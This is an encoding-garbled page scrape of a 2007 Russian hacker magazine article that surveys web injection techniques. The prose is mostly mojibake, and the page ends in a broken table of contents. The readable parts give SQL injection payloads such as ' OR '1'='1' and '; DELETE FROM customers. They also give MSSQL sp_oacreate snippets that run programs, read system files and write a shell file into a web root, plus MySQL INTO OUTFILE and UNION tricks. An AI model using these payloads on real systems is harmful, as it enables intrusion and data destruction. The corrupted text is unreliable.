Ã‘ÂÃ‘Â‚ÃÂ¾ÃÂ¼ - Xakep Online

More documents

Recommendations

Info

30 ÃËÎÁÀËÜÍÀß ÝÏÈÄÅÌÈß ÑÏÅÖ 02-07âíóòðèìûøå÷íîè âíóòðèâåííîÎáçîð òåõíîëîãèé âçëîìà âåá-ðåñóðñîâÏÐÀÊÒÈ×ÅÑÊÈ ËÞÁÎÉ ÑÀÉÒ ÌÎÆÍÎ «ÓÁÈÒÜ» ÏÐÈ ÏÎÌÎÙÈ ÑÌÅÐÒÅËÜÍÛÕ ÈÍÚÅÊÖÈÉ.ÒÀÊÎÉ ÓÊÎË ÌÎÆÍÎ ÑÄÅËÀÒÜ ÒÐÅÌß ÑÏÎÑÎÁÀÌÈ: ÈÍÚÅÊÖÈÅÉ ÊÎÄÀ, ÈÍÚÅÊÖÈÅÉ SQLÈ ÌÅÆÑÀÉÒÎÂÛÌÈ ÑÊÐÈÏÒÀÌÈ. ÏÐÎ ÂÑÅ ÒÐÈ ÂÈÄÀ ÏÈÑÀËÎÑÜ Î×ÅÍÜ ÌÍÎÃÎ ÑÒÀÒÅÉ,Â ÝÒÎÌ ÆÅ ÌÀÒÅÐÈÀËÅ ß ÕÎ×Ó ÍÅ ÏÐÎÑÒÎ ÐÀÑÑÊÀÇÀÒÜ, ÍÎ È ÏÐÎÀÍÀËÈÇÈÐÎÂÀÒÜÂÑÅ ÂÈÄÛ ÈÍÚÅÊÖÈÉÁîðèñ Âîëüôñîíborisvolfson@gmail.com, http://splendot.comÑêðèïòâçëîìùèêàÑêðèïò,âûïîëíÿåìûéíà ñåðâåðåÏëîõàÿ îáðàáîòêàâõîäíûõ äàííûõcode injection. «Ýòîò âèä óÿçâèìîñòåé, ñëàâàÁîãó, ïîòèõîíüêó îòìèðàåò è ôàêòè÷åñêè âñòðå÷àåòñÿòîëüêî íà ñàìîïèñíûõ ñàéòàõ», — òàêèå ìûñëèáðîäèëè ó ìåíÿ â ãîëîâå ïåðåä íàïèñàíèåì ñòàòüè.«Âî-ïåðâûõ, ÷òîáû òàêóþ äûðó ñäåëàòü, íóæíî íàïèñàòüðåàëüíî êðèâîé êîä. Âî-âòîðûõ, ýòî îäèí èçñàìûõ ñòàðûõ è õîðîøî îïèñàííûõ âèäîâ óÿçâèìîñòåé…»,â îáùåì, êðàòêî êîñíåìñÿ òåìû èíúåêöèèêîäà, è òóò æå ïåðåéäåì ê íîðìàëüíûì óÿçâèìîñòÿì».Èìåííî òàê ÿ è ðàññóæäàë, ïîýòîìó çà òåêóùèìèíîâîñòÿìè ïî òåìå ñõîäèë â Google ÷èñòîäëÿ ïðîôîðìû. Êàêîâî æå áûëî ìîå óäèâëåíèå,êîãäà ïî çàïðîñó «code injection» ÿ íàøåë èíôîðìàöèþî äûðêàõ â äîâîëüíî èçâåñòíûõ ñèñòåìàõ âåäåíèÿáëîãîâ è óïðàâëåíèÿ êîíòåíòîì.Â òåîðèè âñå âûãëÿäèò ïðîñòî: åñòü ñêðèïò,èñïîëíÿåìûé íà ñåðâåðå, â êîòîðûé âçëîìùèêóíåîáõîäèìî âñòðîèòü ñâîé êîä. Ïðîâåðíóòü òàêóþìàõèíàöèþ äîâîëüíî ïðîñòî, åñëè ñîáëþäåíûäâà óñëîâèÿ. Âî-ïåðâûõ, âåá-ðàçðàáîò÷èê äîëæåíèñïîëüçîâàòü êîíñòðóêöèþ include ñ ïàðàìåòðîìïåðåìåííîé, à âî-âòîðûõ, äîëæåí ïëîõî ïðîâåðÿòüäàííûå, ïîñòóïàþùèå îò ïîëüçîâàòåëÿ. Íàèáîëåå÷àñòî òàêàÿ ñèòóàöèÿ âîçíèêàåò â ïðîñòûõñêðèïòàõ:HTML + PHPÑîîòâåòñòâåííî, ðàáîòà èäåò ñî ññûëêàìè òèïàhttp://tralivali/index.php?page=about.php. Ñàìîå áåçîáèäíîå,÷òî ìîæíî ñäåëàòü — ýòî ïðîñìîòðåòü èíôîðìàöèþî PHP (è íå òîëüêî):Ñõåìà èíúåêöèè êîäà
31PHPÑîçäàâ òàêîé ôàéë ó ñåáÿ íà ñåðâåðå, ïðîñòî âêëþ-÷àåì åãî â çàïðîñ âìåñòî about.php — è âèäèì âñþèíôîðìàöèþ íà ýêðàíå. Òàêèì îáðàçîì, ìû âíåäðèëèïðîèçâîëüíûé êîä â ñêðèïò íà ñåðâåðå è ïîëó÷èëèíåîáõîäèìóþ èíôîðìàöèþ. Íî ýòî òîëüêîöâåòî÷êè, âåäü ìîæíî ïðè ïîìîùè PHP ñäåëàòüâñå, ÷òî íàøåé äóøå óãîäíî.Íàïèñàâ âûøåîïèñàííûé ïðèìåð, ÿ çàäóìàëñÿî åãî íàèãðàííîñòè è çàøåë â Ãóãë. Êàêîâî æåáûëî ìîå óäèâëåíèå, ÷òî ïî ñîîòâåòñòâóþùåìó çàïðîñó3 ñàéòà èç ïåðâîé äåñÿòêè áûëè óÿçâèìû.Âîèñòèíó — äåíü îòêðûòèé ;).SQL Injection. Ïðèñòóïèì êî âòîðîìó áëþäó —âìåñòî áîðùà ó íàñ èíúåêöèÿ SQL. Äàâíûì-äàâíî,êîãäà ïî çåìëå åùå õîäèëè äèíîçàâðû, âåá-ïðîãðàììåðûèñïîëüçîâàëè äëÿ õðàíåíèÿ äàííûõ òåêñòîâûåôàéëû. Ïîòîì, êîãäà ÷åëîâåê èçîáðåë êîëåñî,âåá-ðàçðàáîò÷èêè ïðèäóìàëè áàçû äàííûõè ñòàëè õðàíèòü âñå â íèõ. È áûëî âñåì ñ÷àñòüå —SQL-êîäâçëîìùèêàÇàïðîñê áàçå äàííûõÑõåìà SQL-èíúåêöèèÏëîõàÿ ôèëüòðàöèÿââîäà íà SQL-îïåðàòîðûè cïèñîê ïîëüçîâàòåëåé òóäà çàñóíóòü ìîæíî, è âñåäîêóìåíòû íà ñàéòå ïîëîæèòü. Íî îäíàæäû îäèíóìåëåö ñëó÷àéíî ââåë â ôîðìó àïîñòðîô, è âûäàëñêðèïò SQL-îøèáêó. Ïðî÷èòàë óìåëåö ñîîáùåíèå,ïîäóìàë íåìíîãî è ââåë âìåñòî àïîñòðîôà ' OR'1'='1’, åùå íåìíîãî ïîêîëäîâàë è ñòàë ñ òåõ ïîð àäìèíèñòðàòîðîì.Íà òîì è ñàéòó êîíåö, à êòî ïîíÿë— ìîëîäåö. À êòî íå ïîíÿë — äëÿ òåõ ïîÿñíþ ;).Ðàáîòà ñ áàçîé âåäåòñÿ íà ÿçûêå SQL, íàïðèìåð,÷òîáû ïðîâåðèòü, ÷òî ïîëüçîâàòåëü ñóùåñòâóåò,ìîæíî ñäåëàòü òàêîé çàïðîñ ïî ëîãèíó:JavaScriptâçëîìùèêàÏëîõàÿ ôèëüòðàöèÿJavaScriptÑòðàíèöà,êîòîðàÿ áóäåòïîêàçàíà ïîëüçîâàòåëþÑõåìà ìåæñàéòîâîãî ñêðèïòèíãàSQLSELECT * FROM users WHERE username='$username'À òåïåðü ïîäñòàâü â çàïðîñ àïîñòðîô èëè ' OR '1'='1’è ïîñìîòðè, ÷òî ïîëó÷èòñÿ. Ôàêòè÷åñêè, ìû ìîæåìâûïîëíèòü ïðîèçâîëüíûé SQL-çàïðîñ, è ñëó÷èòüñÿ÷òî-íèáóäü íåõîðîøåå:SQL'; DELETE FROM customers WHERE 1or username = 'Ñíèïåòû MSSQL-èíúåêöèé äëÿ ActiveX«Advanced SQL Injection In SQL Server Applications»Çàïóñêàåì áëîêíîòdeclare @o intexec sp_oacreate 'wscript.shell', @o outexec sp_oamethod @o, 'run', NULL, 'notepad.exe'[Ñìîòðèì ôàéë boot.ini]declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'opentextfile', @f out, 'c:\boot.ini', 1exec @ret = sp_oamethod @f, 'readline', @line outwhile( @ret = 0 )beginprint @lineexec @ret = sp_oamethod @f, 'readline', @line outendÏîëó÷àåì shelldeclare @o int, @f int, @t int, @ret intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o, 'createtextfile', @f out, 'c:\inetpub\wwwroot\foo.asp', 1exec @ret = sp_oamethod @f, 'writeline', NULL,''[Ñåðâåð ãîâîðèò, ÷òî îí çàõâà÷åí]declare @o int, @ret intexec sp_oacreate 'speech.voicetext', @o outexec sp_oamethod @o, 'register', NULL, 'foo', 'bar'exec sp_oasetproperty @o, 'speed', 150exec sp_oamethod @o, 'speak', NULL, 'all your sequel servers are belong to,us', 528waitfor delay '00:00:05'(1)Õî÷ó êèíóòü åùå ïàðó õîðîøèõ èäåé, êàê ìîæíî âîñïîëüçîâàòüñÿSQL-èíúåêöèåé. Äëÿ ýòîãî ìû ðàññìîòðèìäåòàëè äèàëåêòîâ ÿçûêà SQL ó ðàçíûõ ïðîèçâîäèòåëåé.Íà÷íåì ñ MySQL, êîòîðûé äåëàåò òî, ÷òî ÿîò íåãî íèêàê íå îæèäàë ;). À ïðîáëåìà ïðîñòà: åñëèSELECT-çàïðîñ ïîäâåðæåí èíúåêöèè, òî íå ôàêò, ÷òîåãî ðåçóëüòàò áóäåò âûâåäåí íà ýêðàí, íî åñëè âíèìàòåëüíîïî÷èòàòü ðóêîâîäñòâî ïî MySQL, òî ìîæíîíàéòè çàìå÷àòåëüíûé ôóíêöèîíàë — ðåçóëüòàò çàïðîñàìîæíî ïåðåíàïðàâèòü â ôàéë!SQLSELECT FROM INTO OUTFILE '';Òåïåðü îñòàëîñü íàéòè êàòàëîã, êîòîðûé íàñ ïðèþòèò.Â ñëó÷àå ñ CMS âñå ðåøàåòñÿ äîâîëüíî ïðîñòî — ïî÷òèâñåãäà åñòü êàòàëîã äëÿ çàãðóçêè ôàéëîâ upload.Èìåííî â òàêîé êàòàëîã è ñòîèò ïåðåíàïðàâëÿòü âûâîä.Íà÷èíàÿ ñ ÷åòâåðòîé âåðñèè, MySQL ïîääåðæèâàåòîáúåäèíåíèå çàïðîñîâ ïðè ïîìîùè êîìàíäûUNION. Òàêèì îáðàçîì, ìîæíî âûâåñòè äîïîëíèòåëüíóþèíôîðìàöèþ èç ïðîèçâîëüíîé òàáëèöû.Ïîñìîòðèì, êàê ýòî âûãëÿäèò íà ïðèìåðå:SQLSELECT title, description FROM articlesWHERE id=’$id’;Title è description èìåþò òèï varchar, ïîýòîìó ïåðåìåííîé$id íóæíî ïðèñâîèòü òàêîå çíà÷åíèå, ÷òîáûïðè ïîäñòàíîâêå ïîëó÷èëñÿ ñëåäóþùèé çàïðîñ:SQLSELECT title, description FROM articlesWHERE id=’123123’
Page 1: 02(75)ÔÅÂÐÀËÜ 2007ÅÆÅÌÅ
Page 4 and 5: ÅÆÅÌÅÑß×ÍÛÉÒÅÌÀÒÈ
Page 6 and 7: timeline2000{çàðîæäåíèå}
Page 8: 06 /37 ÃËÎÁÀËÜÍÀß ÝÏÈ
Page 11 and 12: 9æåò âûïîëíÿòü íåñê
Page 13 and 14: 11ñåðâåðå åñòü òàáë
Page 15 and 16: 13Ïîïðîáóåì âñàäèòü
Page 17 and 18: ÝÍÖÈÊËÎÏÅÄÈßGamePostÎ
Page 19 and 20: 17ÝÊÑÏËÎÉÒÀ ÏÎÄ ÊÀÊ
Page 21 and 22: 19çíà÷åíèå èìååò $var1
Page 23 and 24: VERSUS4,3 KENTSFIELD SLINVIDIA Ge
Page 25 and 26: 23ïðèòîíûèíòåðíåòà
Page 27 and 28: 255 /5BugTraq.Ruwww.bugtraq.ru3,5 /
Page 29 and 30: 27Òàáëèöà 1Òàáëèöà 2
Page 31: 29abstract class Decorator extends
Page 36 and 37: 34 ÃËÎÁÀËÜÍÀß ÝÏÈÄÅ
Page 38 and 39: 36 ÃËÎÁÀËÜÍÀß ÝÏÈÄÅ
Page 40: 38 /67 ÎØÈÁÊÈÌÎËÎÄÎÑÒ
Page 43 and 44: 41ÁÛÒÜ ÎÁÐÀÙÅÍÈß Ê Ô
Page 45 and 46: 1 ÌÅÑÒÎ 2 ÌÅÑÒÎ 3 ÌÅÑ
Page 47 and 48: 45ïðîèçâîäèì ïðîâåð
Page 49 and 50: 47CyD NET Utilswww.cydsoft.comshare
Page 52 and 53: 50 ÎØÈÁÊÈ ÌÎËÎÄÎÑÒÈ
Page 54 and 55: 52 ÎØÈÁÊÈ ÌÎËÎÄÎÑÒÈ
Page 56: 54 ÎØÈÁÊÈ ÌÎËÎÄÎÑÒÈ
Page 59 and 60: 57Q: Êàê îò SQL injection è X
Page 61 and 62: æå ëþäÿì, ïðîñòî îð
Page 63 and 64: http://www.gameland.ru/ Dark Fall:
Page 65 and 66: 63Íó è, íàêîíåö, Perl î
Page 67 and 68: 65Íåñêîëüêî ñëîâ î Ne
Page 69 and 70: 67http://dm9.ru/cgi-bin/perltest/sc
Page 71 and 72: 69î ïîäëîãå. Îïÿòü æ
Page 73 and 74: 71ñåíêó ïîä íîìåðîì
Page 75 and 76: 73ÊÀÊÈÅ ÑÏÎÑÎÁÛ ÁÎÐ
Page 77: {IT}Ñ ÌÀÐÒÀÂÑÅ ÁÓÄÅÒ
Page 82 and 83:
80 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07È
Page 84 and 85:
82 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07Ï
Page 86 and 87:
84 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07è
Page 88 and 89:
86 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07ì
Page 90 and 91:
88 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07ã
Page 92:
90 ÑÏÅÖ-TOPIC ÑÏÅÖ 02-07Ò
Page 95 and 96:
93DEEPNESS IN THE SKYby MFXAETHERby
Page 97 and 98:
îáùåíèÿ äèñêóññèè.
Page 99 and 100:
Vista Manager 1.0.3winxp-manager.co
Page 101 and 102:
MSI MEGABOOKS430($1199) 6 áàëë
Page 103 and 104:
MSI MEGABOOKS430($1199) 6 áàëë
Page 105 and 106:
2Àíäðåé Êàðàìíîââå
Page 107 and 108:
105 |ìÿ îíëàéí, æäåò â
Page 109 and 110:
Ðûêîâ áûë óâåðåí: î
Page 111 and 112:
ìîæíîãî çàêëàäûâàí
Page 113 and 114:
Õâàëþ. Íàì áû ñ âàìè
Page 115:
Думаешь, что посмот
show all

Ã‘ÂÃ‘Â‚ÃÂ¾ÃÂ¼ - Xakep Online

Create successful ePaper yourself

Delete template?

Save as template?

Ã‘ÂÃ‘Â‚ÃÂ¾ÃÂ¼ - Xakep Online